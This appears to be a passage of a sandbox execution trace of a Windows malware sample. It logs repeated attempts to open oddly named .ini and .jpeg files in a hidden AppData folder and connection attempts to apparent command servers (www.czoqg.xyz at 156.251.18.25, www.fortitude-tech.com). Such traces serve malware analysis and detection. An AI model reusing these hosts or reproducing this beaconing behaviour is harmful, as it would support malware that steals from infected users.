ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0164.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0164.972] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a410) returned 1 [0164.972] socket (af=2, type=1, protocol=6) returned 0x2574 [0164.972] getaddrinfo (in: pNodeName="www.czoqg.xyz", pServiceName="80", pHints=0x8791b98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791bc8 | out: ppResult=0x8791bc8*=0x862b700*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8883460*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), ai_next=0x0)) returned 0 [0164.991] connect (s=0x2574, name=0x8883460*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), namelen=16) returned -1 [0186.167] closesocket (s=0x2574) returned 0 [0186.188] Sleep (dwMilliseconds=0x7d0) [0186.216] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.217] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.217] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0186.217] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.217] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.217] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.217] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e0b0) returned 1 [0186.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.217] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.217] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.217] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0186.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.217] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.218] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.218] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.218] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.218] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.218] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.218] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.218] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.218] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d8d0) returned 1 [0186.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.218] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.218] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.218] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.218] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.219] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.219] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894da80) returned 1 [0186.219] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.219] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.219] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.219] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894dba0) returned 1 [0186.219] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.219] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.219] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.219] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e1d0) returned 1 [0186.219] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.219] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.219] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0186.219] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894c370) returned 1 [0186.220] socket (af=2, type=1, protocol=6) returned 0x2574 [0186.221] getaddrinfo (in: pNodeName="www.fortitude-tech.com", pServiceName="80", pHints=0x8791f38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791f68 | out: ppResult=0x8791f68*=0x0) returned 11001 [0186.236] Sleep (dwMilliseconds=0x7d0) [0186.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.237] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0186.237] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0186.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.237] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.237] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894da80) returned 1 [0186.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.237] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.237] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.237] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d8d0) returned 1 [0186.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.237] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.238] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.238] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.238] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894da80) returned 1 [0186.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.238] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0186.238] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0186.238] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0186.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0186.238] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, 